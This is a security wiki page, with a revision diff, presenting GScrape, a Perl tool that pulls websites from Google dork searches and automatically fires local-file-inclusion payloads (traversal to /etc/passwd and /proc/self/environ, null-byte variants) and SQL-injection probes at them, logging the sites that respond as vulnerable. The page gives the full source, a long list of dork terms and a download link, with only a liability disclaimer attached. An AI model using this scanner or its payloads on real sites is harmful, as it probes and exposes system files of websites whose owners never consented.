Questions about this topic? Sign up to ask in the talk tab.

Difference between revisions of "GScrape"

From NetSec
Jump to: navigation, search
 
(12 intermediate revisions by 6 users not shown)
Line 1: Line 1:
 +
{{info|<center>GScrape is a small [[Perl|perl]] script that uses Google's Ajax API (Google::Search) to find vulnerable websites.</center>}}
 +
<font size="-2">Special thanks to [[User:Trep|Trep]] for his contributions to this article.</font>
 
=Introduction=
 
=Introduction=
GScrape is a small [[Perl|perl]] script that uses Google's Ajax API (Google::Search in [http://search.cpan.org/~rokr/Google-Search-0.027/lib/Google/Search.pm | CPAN]) to find vulnerable websites.
+
{{main|Web exploitation tools}}
 
+
The purpose of this script is to demonstrate that one can easily create simple tools to do tedious tasks.
+
  
 +
The purpose of this script is to demonstrate that one can easily create simple tools to do tedious tasks.  This script requires the ''Google::Search'' perl module.
 +
* You can install Google::Search using CPAN:
 +
{{LinuxCMD|cpan -i Google::Search}}
 
=Example=
 
=Example=
 +
 
GScrape is a simple tool, it will look for a file specified by the user containing a list of search terms,  
 
GScrape is a simple tool, it will look for a file specified by the user containing a list of search terms,  
 
query google with those search terms and retrieve an array of websites,
 
query google with those search terms and retrieve an array of websites,
Line 92: Line 96:
 
my $random = int(rand($num));
 
my $random = int(rand($num));
 
 
if ( @search_terms[$random] !~ /inurl:/ ){ ##had to learn to use regex sooner or later..
+
if ( @search_terms[$random] !~ /inurl:/ ){  
 
push(@dorks, "inurl:".@search_terms[$random]);
 
push(@dorks, "inurl:".@search_terms[$random]);
 
}  
 
}  
Line 201: Line 205:
 
             \r+=====================================================================+
 
             \r+=====================================================================+
 
             \r                       
 
             \r                       
             \r                      www.BlackhatAcademy.org
+
             \r                      www.BlackhatAcademy.net
 
           " );
 
           " );
 
            
 
            
Line 365: Line 369:
 
</source>
 
</source>
 
}}
 
}}
 
 
 
 
  
 
=Search Terms=
 
=Search Terms=
Line 443: Line 443:
 
* historialeer.php?num=
 
* historialeer.php?num=
 
* reagir.php?num=
 
* reagir.php?num=
----
+
 
 +
 
 +
= Download =
 +
 
 +
* '''Download URL''': http://www.blackhatlibrary.net/releases/gscrape.tgz
 +
 
 +
 
 +
 
 +
 
 
{{InHouse}}
 
{{InHouse}}
 
{{series
 
{{series
Line 621: Line 629:
 
             \r+=====================================================================+
 
             \r+=====================================================================+
 
             \r                       
 
             \r                       
             \r                      www.BlackhatAcademy.org
+
             \r                      www.BlackhatAcademy.net
 
    \r                              v+$currentversion  
 
    \r                              v+$currentversion  
 
           " );
 
           " );
Line 756: Line 764:
  
 
-->
 
-->
 
+
[[Category:Web exploitation]] [[Category:Programming]] [[Category:Information gathering]]
[[Category:Web exploitation]] [[Category:Programming]] [[Category:Information_Gathering]]
+

Latest revision as of 08:29, 21 April 2013

c3el4.png
GScrape is a small perl script that uses Google's Ajax API (Google::Search) to find vulnerable websites.

Special thanks to Trep for his contributions to this article.

Introduction

Main article: Web exploitation tools

The purpose of this script is to demonstrate that one can easily create simple tools to do tedious tasks. This script requires the Google::Search perl module.

  • You can install Google::Search using CPAN:
Terminal

localhost:~ $ cpan -i Google::Search

Example

GScrape is a simple tool, it will look for a file specified by the user containing a list of search terms, query google with those search terms and retrieve an array of websites,

which are then tested for Local File Inclusion and SQL injection vulnerabilities, if any are found they are logged to the output file specified by the user.

 perl gscrape.pl -f dork.lst -o gscrape.log
RPU0j.png GScrape will not return any results unless your input file actually contains a list of search terms.

Source

 
#!/usr/bin/perl
 
# gscrape.pl
#
# Uses Google::Search to either iterate through a list of dorks (dorks.lst)
# And then prints out a list of vulnerable sites.
 
use Term::ANSIColor;
use Getopt::Std;
use HTTP::Request;
use Google::Search;
use LWP::UserAgent;
 
#vars n stuff
my $search;
my $useragent = LWP::UserAgent->new();
my $infile;
my $outfile;
my $searchmode;
my @url_list;
my @search_terms; #search terms and
my @dorks;        #dorks, to check if the terms have "inurl:".
my @vulnsites;
 
 
 
##--main execution:
		&banner();
		&getOpts();
 
 
		if ($opt{s} || $opt{f} && $opt{o} && !$opt{h}) {
		&printInfo("Trying with the following settings:");
		&printInfo( ">>Search Mode: $searchmode");
		&printInfo( ">>Output file: $outfile");
 
	if ($searchmode == "single" && $searchmode != "list"){
 
		&printInfo( ">>Search Term: $search");
		&search_single();
		} else {
			 &printInfo( ">>Search List: $infile");
			 &search_list(); 
			 }
 
 
		 }
		 if (!$opt{h} && !$opt{o}){
             &printCritical("YOU MUST SPECIFY AN OUTPUT FILE!1!one!");
             &printInfo("use -h flag for help");
			 print"\n\r\nExiting..\n";
		 }
 
 
 
 
 
 
##--subroutines:.
 
 
 
#Search using a list of terms:
sub search_list(){
 
open FILE, "<", $infile or die $!;
my @search_terms = <FILE>;
my $num = @search_terms;
&printInfo("Loaded $num search terms.");
&printInfo("Fixing improper search terms [if any]");
#iterate through the search terms, checking if they have "inurl:" if not, prepend it.
for( my $int = 0; $int < $num; $int++){
	my $random = int(rand($num));
 
	if ( @search_terms[$random] !~ /inurl:/ ){ 
		push(@dorks, "inurl:".@search_terms[$random]);
		} 
	if ( @search_terms[$random] =~ /inurl:/){
		push(@dorks, @search_terms[$random]);
		}
 
 
	}
	print"\n";
&printInfo("Retrieving search results..");
 
#iterate through the google dorks (search terms, with 'inurl:'), and add them to the list of sites.
foreach(@dorks) { 
 
	 $search = Google::Search->Web( query => $_ );
	while ( my $result = $search->next ) {
		if( $result->uri =~ /\=/) { #check if results have "=" in them (ex: www.site.com/index.php?page=LOLCATS)
			push(@url_list, $result->uri); #push result into the array
			&printInfo(">>".$result->uri);
		}
	}
}
 
my @lfitest = (
    '/etc/passwd%00',
	'/etc/passwd',
	'/proc/self/environ%00',
	'/proc/self/environ',
	'../../../../../../../../../../../../../../../proc/self/environ',
	'../../../../../../../../../../../../../../../proc/self/environ%00',
    '../../../../../../../../../../../../../../../etc/passwd',
    '../../../../../../../../../../../../../../../etc/passwd%00',
    "'"
    );
 
 
my $lfinum = @lfitest;
 
print"\n";
&printInfo("Testing sites for vulnerabilities..");
 
 
 
#Test the sites for vulns.
 
foreach( @url_list ){
	my $index = @url_list;
	my $randint = int(rand($index));
 
		my $x = @url_list[$randint];
		$x =~ s/=.*/=/ ;
 
 
 
		for (my $i = 0; $i < $lfinum; $i++){
			if ( $x !~ /http:\/\// ){
				$x = "http://".$x;
			}
 
 
 
        my $request = $useragent->get($x.@lfitest[$i]);
        my $result = $request->content;
 
        if ($result =~ m/root:x:/i || m/HTTP_USER_AGENT/){
			&printVulnLFI(">>> ".$x.@lfitest[$i]);
			open FILE, ">>", $outfile or die $!;
			print FILE "[LFI VULN] >> ".$x.@lfitest[$i]."\n";
			close FILE;
			last;
		}
		if ($result =~ m/error in your/i || m/syntax/i){
			&printVulnSQLI(">>> ".$x.@lfitest[$i]);
						open FILE, ">>", $outfile or die $!;
			print FILE "[SQLI VULN] >> ".$x.@lfitest."'\n";
			close FILE;
			last;
		}
		if ($result =~ m/hacking/i || m/reported/i ||  m/recorded/i || m/malicious/i){
			&printCritical("> Whoops! Tripped an IDS at: ".$x." With: ".@lfitest[$i]);
 
		}
 
	}
}
 
}
 
 
 
 
 
 
sub banner() {
system('clear');
    print("\r+=====================================================================+
           \r|                              GScrape                                |
           \r|         ________  _________                                         |
           \r|        /  _____/ /   _____/ ________________  ______   ____         |
           \r|       /   \\  ___ \\_____  \\_/ ___\\_  __ \\__  \\ \\____ \\_/ __ \\        |
           \r|       \\    \\_\\  \\/        \\  \\___|  | \\// __ \\|  |_> >  ___/        |
           \r|        \\______  /_______  /\\___  >__|  (____  /   __/ \\___  >       |
           \r|               \\/        \\/     \\/           \\/|__|        \\/        |
           \r|                                                                     |
           \r|                                                                     |
           \r|           Uses Google AJAX API to search for vulnerabilities        |
            \r+=====================================================================+
            \r                      
             \r                       www.BlackhatAcademy.net
           " );
 
           printWarning("THE END USER IS LIABLE FOR THE USE OF THIS SOFTWARE.
                         \rUSING THIS AGAINST ANY SYSTEM WITHOUT PERMISSION IS A CRIMINAL ACT
                         \rTHE AUTHOR TAKES NO RESPONSIBILITY FOR THE END-USER'S ACTIONS.\n");
 
 
 
}
 
 
sub getOpts(){
	#option modes, and args.
	my $opt_string = 'f:o:h';
        getopts( "$opt_string", \%opt );
 
        #set vars of $outfile, and $infile if they are defined.
 
 
		if ($opt{o}){
			$outfile = $opt{o};
		}
 
		if ($opt{f}){
 
			$infile = $opt{f};
			$searchmode = "list";
 
		}
 
 
 
        #Display help page if -h
        usage() if $opt{h};
 
 
 
}
#YES HELLO, THIS IS HELP PAGE.
sub usage(){
	print("
 
 
 GScrape Usage:
 
	Search using a list of search terms:
	 -f /path/to/dorks.txt
 
 
	Define output file:
	 -o results.out
 
 
 
 
Example Usages:
 
    Run a list of search terms through the scanner:
	 perl gscrape.pl -f ~/Dork.lst -o ~/result.out 
 
 
	");
}
 
 
	#HERE BE ANSICOLOR:
	# [INFO] [CRITICAL] and [WARNING] messages
 
	sub printCritical(){
		my $error = shift(@_);
 
 
     print color 'bold blue';
     print "\r[";
     print color 'red';
     print "CRITICAL";
     print color 'bold blue';
     print "]  "; 
     print color 'red';
     print color 'reset';
     print $error."\n";
 
	}
	sub printWarning(){
 
		my $error = shift(@_);
 
 
     print color 'bold blue';
     print "\r[";
     print color 'yellow';
     print "WARNING";
     print color 'bold blue';
     print "]  "; 
     print color 'reset';
     print $error."\n";
 
	}
	sub printInfo(){
 
		my $info = shift(@_);
 
 
     print color 'bold blue';
 
     print "\r[";
     print color 'reset';
     print "INFO";
     print color 'bold blue';
     print "]  "; 
     print color 'reset';
     print $info."\n";
 
	}
 
		sub printVulnLFI(){
 
		my $info = shift(@_);
 
 
     print color 'bold blue';
 
     print "\r[";
     print color 'green';
     print "LFI VULN ";
     print color 'bold blue';
     print "]  "; 
     print color 'reset';
     print $info."\n";
 
	}
 
			sub printVulnSQLI(){
 
		my $info = shift(@_);
 
 
     print color 'bold blue';
 
     print "\r[";
     print color 'green';
     print "SQLI VULN";
     print color 'bold blue';
     print "]  "; 
     print color 'reset';
     print $info."\n";
 
	}
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Search Terms

These are just some examples of general search terms, they are not guaranteed to find any vulnerabilities.. but they probably will, with that said you are responsible for what you do with what you find using this tool.

c3el4.png Please note that your search terms in the file DO NOT require "inurl:", GScrape adds it for you if it isn't there.
  • .php?*=
  • inurl:index.php?page=
  • inurl:include.php?*=
  • index.php?include=
  • inurl:index.php?nic=
  • inurl:index.php?sec=
  • inurl:index.php?content=
  • inurl:index.php?link=
  • inurl:index.php?filename=
  • inurl:index.php?dir=
  • inurl:index.php?document=
  • inurl:index.php?view=
  • inurl:*.php?sel=
  • inurl:*.php?session=&content=
  • inurl:*.php?locate=
  • inurl:*.php?place=
  • inurl:*.php?layout=
  • inurl:*.php?go=
  • inurl:*.php?catch=
  • inurl:*.php?mode=
  • inurl:*.php?name=
  • inurl:*.php?loc=
  • inurl:*.php?f=
  • inurl:*.php?inf=
  • inurl:*.php?pg=
  • inurl:*.php?load=
  • inurl:*.php?naam=
  • cat.asp?cat=
  • Productlist.asp?Catalogid=
  • Category.asp?Category_Id=
  • Category.cfm?Category_Id=
  • category.asp?cid=
  • category.cfm?cid=
  • category.asp?cat=
  • category.cfm?cat=
  • category.asp?id=
  • index.cfm?Pageid=
  • category.asp?catid=
  • Category.asp?c=
  • Category.cfm?c=
  • Productlist.cfm?Catalogid=
  • Productlist.asp?Catalogid=
  • Viewitem.asp?Catalogid=
  • Viewitem.cfm?Catalogid=
  • catalog.cfm?Catalogid=
  • catalog.asp?Catalogid=
  • department.cfm?Dept=
  • department.asp?Dept=
  • Itemdetails.cfm?Catalogid=
  • Itemdetails.asp?Catalogid=
  • index.php?id=
  • trainers.php?id=
  • buy.php?category=
  • article.php?ID=
  • play_old.php?id=
  • declaration_more.php?decl_id=
  • Pageid=
  • games.php?id=
  • page.php?file=
  • newsDetail.php?id=
  • gallery.php?id=
  • article.php?id=
  • show.php?id=
  • staff_id=
  • newsitem.php?num=
  • readnews.php?id=
  • top10.php?cat=
  • historialeer.php?num=
  • reagir.php?num=


Download



We have more tools coming soon! Look forward to Chimera Live CD.
c3el4.png
These are the offensive security tools developed by our wiki staff.


GScrape
is part of a series on

Web Exploitation

Visit the Web Exploitation Portal for complete coverage.